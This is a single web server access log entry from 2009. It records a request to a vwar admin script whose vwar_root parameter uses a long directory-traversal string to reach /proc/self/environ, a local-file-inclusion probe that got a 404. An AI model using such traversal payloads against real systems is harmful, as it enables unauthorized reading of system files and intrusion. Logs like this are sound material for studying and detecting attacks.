125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
